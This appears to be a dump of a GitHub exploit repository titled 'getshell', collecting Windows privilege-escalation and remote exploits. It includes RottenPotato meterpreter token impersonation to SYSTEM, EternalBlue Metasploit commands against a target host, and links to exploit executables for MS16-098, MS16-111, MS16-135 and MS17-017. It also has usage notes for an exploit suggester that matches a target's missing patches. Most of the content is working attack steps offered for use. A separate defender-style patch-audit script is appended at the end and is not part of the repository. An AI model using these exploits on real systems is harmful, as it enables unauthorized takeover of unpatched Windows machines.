56 | 57 | HBRUSH hBrush = (HBRUSH)CreateSolidBrush((COLORREF)0x00edfc13); 58 | 59 | FillRgn((HDC)hdc, (HRGN)hRgn, (HBRUSH)hBrush); 60 | } 61 | 62 | int _tmain(int argc, _TCHAR* argv[]) 63 | { 64 | Trigger_BSoDPoc(); 65 | return 0; 66 | } 67 | -------------------------------------------------------------------------------- /MS16-034/README.md: -------------------------------------------------------------------------------- 1 | # MS16-034 2 | 3 | 4 | (XP/Vista/Win7/Win8/2000/2003/2008/2012) 5 | 6 | My SSCTF pwn450 Windows Kernel Exploitation MS16-034 Writeup URL: 7 | 
http://whereisk0shl.top/ssctf_pwn450_windows_kernel_exploitation_writeup.html 8 | 9 | My blog: 10 | http://whereisk0shl.top 11 | -------------------------------------------------------------------------------- /MS16-075/README.md: -------------------------------------------------------------------------------- 1 | # MS16-075 2 | 3 | - The potato.exe was from [@FoxGlove](https://github.com/foxglovesec/RottenPotato) 4 | - For a technical overview of this [exploit]( https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) 5 | 6 | Vulnerability reference: 7 | * [MS16-075](https://technet.microsoft.com/library/security/MS16-075) 8 | 9 | 10 | ## RottenPotato 11 | 12 | Local Privilege Escalation from Windows Service Accounts to SYSTEM 13 | 14 | ## Videos for example 15 | - [SQL Server](https://www.youtube.com/watch?v=3CPdKMeB0UY) 16 | - [IIS](https://www.youtube.com/watch?v=wK0r-TZR7w8) 17 | 18 | ## Usage of msf 19 | ``` 20 | msf exploit(web_delivery) > set ExitOnsession false 21 | msf exploit(web_delivery) > run 22 | meterpreter > getuid 23 | Server username: IIS APPPOOL\DefaultAppPool 24 | meterpreter > getprivs 25 | =========================================================== 26 | Enabled Process Privileges 27 | =========================================================== 28 | SeAssignPrimaryTokenPrivilege 29 | 30 | meterpreter > upload /root/potato.exe C:\Users\Public 31 | meterpreter > cd C:\\Users\\Public 32 | meterpreter > use incognito 33 | meterpreter > list_tokens -u 34 | NT AUTHORITY\IUSR 35 | 36 | meterpreter > execute -cH -f ./potato.exe 37 | meterpreter > list_tokens -u 38 | NT AUTHORITY\IUSR 39 | NT AUTHORITY\SYSTEM 40 | 41 | meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" 42 | 43 | meterpreter > getuid 44 | Server username: NT AUTHORITY\SYSTEM 45 | ``` 46 | 47 | ### Get a shell has Privileges:SeAssignPrimaryTokenPrivilege 48 | 49 | ![iis](img/IIS_shell.png) 50 | 51 | ### Get system Privilege 52 | 53 
| ![potato](img/potato.png) 54 | *** 55 | - It is important to impersonate the token (or run list_tokens -u) quickly after runnning the binary. 56 | - It is also important to follow the order of the steps. 57 | - Make sure you "use incognito" before running the binary. 58 | 59 | *** 60 | 61 | ## Tater 62 | 63 | a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit 64 | 65 | - The Tater was from [@Kevin-Robertson](https://github.com/Kevin-Robertson/Tater) 66 | ![win10](img/win10.png) 67 | -------------------------------------------------------------------------------- /MS16-075/img/IIS_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-075/img/IIS_shell.png -------------------------------------------------------------------------------- /MS16-075/img/potato.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-075/img/potato.png -------------------------------------------------------------------------------- /MS16-075/img/win10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-075/img/win10.png -------------------------------------------------------------------------------- /MS16-075/potato.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-075/potato.exe -------------------------------------------------------------------------------- /MS16-098/README.md: -------------------------------------------------------------------------------- 1 | # MS16-098 2 | - Exploiting MS16-098 RGNOBJ Integer Overflow on Windows 8.1 x64 
bit by abusing GDI objects (CVE-2016-3309) 3 | - The exp was from [@0x5A1F](https://twitter.com/Saif_Sherei) 4 | 5 | Vulnerability reference: 6 | * [MS16-098](https://technet.microsoft.com/library/security/ms16-098) 7 | * [CVE-2016-3309](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3309) 8 | 9 | ## Usage 10 | ![win8.1](win8_1.png) 11 | 12 | ## References 13 | 14 | * [The previously discussed MS16-098 writeup](https://sensepost.com/blog/2017/exploiting-ms16-098-rgnobj-integer-overflow-on-windows-8.1-x64-bit-by-abusing-gdi-objects/) 15 | * [DC25 5A1F - Demystifying Windows Kernel Exploitation by Abusing GDI Objects](https://github.com/sensepost/gdi-palettes-exp) 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /MS16-098/bfill.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-098/bfill.exe -------------------------------------------------------------------------------- /MS16-098/gdi-palettes-exp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-098/gdi-palettes-exp.zip -------------------------------------------------------------------------------- /MS16-098/win8_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-098/win8_1.png -------------------------------------------------------------------------------- /MS16-111/40429.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-111/40429.exe -------------------------------------------------------------------------------- 
/MS16-111/README.md: -------------------------------------------------------------------------------- 1 | # MS16-111 2 | ``` 3 | The kernel API in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, 4 | Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 does not properly enforce permissions, 5 | which allows local users to obtain sensitive information via a crafted application, aka "Windows Kernel Elevation of Privilege Vulnerability." 6 | ``` 7 | 8 | Vulnerability reference: 9 | * [MS16-111](https://technet.microsoft.com/library/security/ms16-111) 10 | * [cve-2016-3371](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3371) 11 | * [exp-db](https://www.exploit-db.com/exploits/40429/) 12 | 13 | ## Usage 14 | ``` 15 | c:\> 40429.exe 16 | ``` 17 | * [CVE-2016-3371-YouTube](https://youtu.be/SzkbSRbxN1I) 18 | ![win8.1](win8.1.png) 19 | ![win10](win10.png) 20 | 21 | 22 | ### References 23 | - [Windows: NtLoadKeyEx User Hive Attachment Point EoP](https://bugs.chromium.org/p/project-zero/issues/detail?id=865) 24 | -------------------------------------------------------------------------------- /MS16-111/win10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-111/win10.png -------------------------------------------------------------------------------- /MS16-111/win8.1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-111/win8.1.png -------------------------------------------------------------------------------- /MS16-135/40823-source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/40823-source.zip 
-------------------------------------------------------------------------------- /MS16-135/40823/SetWindowLongPtr_Exploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/40823/SetWindowLongPtr_Exploit.exe -------------------------------------------------------------------------------- /MS16-135/40823/SetWindowLongPtr_Exploit.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/40823/SetWindowLongPtr_Exploit.pdb -------------------------------------------------------------------------------- /MS16-135/41015.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/41015.exe -------------------------------------------------------------------------------- /MS16-135/README.md: -------------------------------------------------------------------------------- 1 | # MS16-135 x64 Universal 2 | 3 | The POC for this bug was from [@b33f](http://www.fuzzysecurity.com/)'s post [here](https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135)! 4 | 5 | Vulnerability reference: 6 | * [MS16-135](https://technet.microsoft.com/en-us/library/security/ms16-135.aspx) 7 | * [CVE-2016-7255](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255) 8 | 9 | ## SYSTEM Shell 10 | 11 | The exploit works on all 64-bit vulnerable targets. 
12 | 13 | ## Powershell Allowed script execution 14 | 15 | c:\> set-ExecutionPolicy RemoteSigned 16 | 17 | ### Windows 7 18 | 19 | ![Win7](Win7.png) 20 | 21 | ### Windows 8 22 | 23 | ![Win8](Win8.png) 24 | 25 | ### Windows 8.1 26 | 27 | ![Win81](Win81.png) 28 | 29 | ### Windows 10 30 | 31 | ![Win10](Win10.png) 32 | 33 | ### References 34 | * [MS16-135 x64 Universal](https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135) 35 | * [poc for CVE-2016-7255](https://github.com/tinysec/public/tree/master/CVE-2016-7255) 36 | -------------------------------------------------------------------------------- /MS16-135/Win10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/Win10.png -------------------------------------------------------------------------------- /MS16-135/Win7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/Win7.png -------------------------------------------------------------------------------- /MS16-135/Win8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/Win8.png -------------------------------------------------------------------------------- /MS16-135/Win81.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/Win81.png -------------------------------------------------------------------------------- /MS17-010/MS17-010-2012.zip: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS17-010/MS17-010-2012.zip
--------------------------------------------------------------------------------
/MS17-010/README.md:
--------------------------------------------------------------------------------
# MS17-010

- exp [FUZZBUNCH](https://github.com/exploitx3/FUZZBUNCH)

Vulnerability reference:
* [MS17-010](https://technet.microsoft.com/library/security/ms17-010)
* [CVE-2017-0143](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143)
* [CVE-2017-0144](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144)
* [CVE-2017-0145](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145)
* [CVE-2017-0146](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146)
* [CVE-2017-0148](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148)
* [CVE-2017-0147](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147)

## Usage
```
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 10.10.1.13
msf exploit(ms17_010_eternalblue) > run
```

## References
* [How to get a Meterpreter reverse shell on Windows 2012 by exploiting ETERNALBLUE](https://mp.weixin.qq.com/s?__biz=MzI5MzY2MzM0Mw%3D%3D&mid=2247483946&idx=1&sn=cbe2e5a08470d699daeb74d7904581c7&scene=45#wechat_redirect)
* [MS17-017: Microsoft Windows 7 SP1 x86 Privilege Escalation Vulnerability](https://securityonline.info/ms17-017-microsoft-windows-7-sp1-x86-privilege-escalation-vulnerability/)

--------------------------------------------------------------------------------
/MS17-017/MS17-017.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS17-017/MS17-017.exe
--------------------------------------------------------------------------------
/MS17-017/README.md:
--------------------------------------------------------------------------------
# MS17-017

This security update resolves vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker runs a specially crafted application.

![ms17-017.jpg](ms17-017.jpg)

### References

* Source: https://github.com/sensepost/gdi-palettes-exp
* Binary: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42432.exe
* https://www.exploit-db.com/exploits/42432/

--------------------------------------------------------------------------------
/MS17-017/gdi-palettes-exp.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS17-017/gdi-palettes-exp.zip
--------------------------------------------------------------------------------
/MS17-017/ms17-017.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS17-017/ms17-017.jpg
--------------------------------------------------------------------------------
/win-exp-suggester/2017-06-14-mssb.xls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/win-exp-suggester/2017-06-14-mssb.xls
--------------------------------------------------------------------------------
/win-exp-suggester/help.md:
--------------------------------------------------------------------------------
## Usage

1. First, update the vulnerability database:
```
$ ./windows-exploit-suggester.py --update
[*] initiating...
[*] successfully requested base url
[*] scraped ms download url
[+] writing to file 2017-06-14-mssb.xls
[*] done
```

2. Then install the program's dependency, [python-xlrd](https://pypi.python.org/pypi/xlrd):
```
ubuntu@ubuntu:~/xlrd-0.9.4/xlrd-0.9.4$ sudo python setup.py install
[sudo] password for ubuntu:
running install
running build
running build_py
running build_scripts
running install_lib
creating /usr/local/lib/python2.7/dist-packages/xlrd
copying build/lib.linux-x86_64-2.7/xlrd/compdoc.py -> /usr/local/lib/python2.7/dist-packages/xlrd
......
```

3. Next, run `systeminfo` on the target machine and save its output to the file win7sp1-systeminfo.txt; then pass that file with the `--systeminfo` parameter and specify the database location (the Excel file):
```
$ ./windows-exploit-suggester.py --database 2017-06-14-mssb.xls --systeminfo win7sp1-systeminfo.txt
[*] initiating...
[*] database file detected as xls or xlsx based on extension
[*] reading from the systeminfo input file
[*] querying database file for potential vulnerabilities
[*] comparing the 15 hotfix(es) against the 173 potential bulletins(s)
[*] there are now 168 remaining vulns
[+] windows version identified as 'Windows 7 SP1 32-bit'
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[*] done
```

The following command lists every possible exploit for a given operating system version (assuming the target system has no patches installed at all):
```
$ ./windows-exploit-suggester.py --database 2017-06-14-mssb.xls --ostext 'windows server 2008 r2'
[*] initiating...
[*] database file detected as xls or xlsx based on extension
[*] getting OS information from command line text
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 196 potential bulletins(s)
[*] there are now 196 remaining vulns
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Im
```
--------------------------------------------------------------------------------
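The patch-gap comparison the help text walks through (installed hotfixes from `systeminfo` versus a bulletin-to-KB table) as an added, defender-side audit example; this is not code from the getshell repository or from windows-exploit-suggester. The bulletin table is a constructed excerpt of four bulletins quoted in the output above, the `systeminfo` text is constructed, and unlike the real tool it does not filter bulletins by OS version.

```python
"""Patch-gap audit modelled on windows-exploit-suggester's --systeminfo mode (added example)."""
import re

# Constructed excerpt: bulletin -> (KB article, short title, severity).
# The real tool loads the full Microsoft bulletin spreadsheet (mssb.xls).
BULLETINS = {
    "MS14-012": ("2925418", "Cumulative Security Update for Internet Explorer", "Critical"),
    "MS13-101": ("2880430", "Kernel-Mode Drivers Elevation of Privilege", "Important"),
    "MS13-005": ("2778930", "Kernel-Mode Driver Elevation of Privilege", "Important"),
    "MS10-059": ("982799", "Tracing Feature for Services Elevation of Privilege", "Important"),
}

# Constructed sample of `systeminfo` output, abridged to the fields that matter here.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7-TEST
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               X86-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2880430
                           [02]: KB2925418
                           [03]: KB976902
"""


def parse_systeminfo(text):
    """Return (os_name, os_version, set of installed KB numbers as strings)."""
    os_name = re.search(r"^OS Name:\s*(.+)$", text, re.M)
    os_version = re.search(r"^OS Version:\s*(.+)$", text, re.M)
    hotfixes = set(re.findall(r"\bKB(\d+)\b", text))  # every "KBnnnnnn" token in the listing
    return (os_name.group(1).strip() if os_name else "",
            os_version.group(1).strip() if os_version else "",
            hotfixes)


def missing_bulletins(text, bulletins=BULLETINS):
    """Bulletins whose KB is not installed, newest bulletin id first."""
    _, _, installed = parse_systeminfo(text)
    missing = [(bid, kb, title, sev) for bid, (kb, title, sev) in bulletins.items()
               if kb not in installed]
    return sorted(missing, reverse=True)


if __name__ == "__main__":
    name, version, installed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"[+] {name} ({version}), {len(installed)} hotfix(es) installed")
    for bid, kb, title, sev in missing_bulletins(SAMPLE_SYSTEMINFO):
        print(f"[M] {bid}: {title} ({kb}) - {sev}")
```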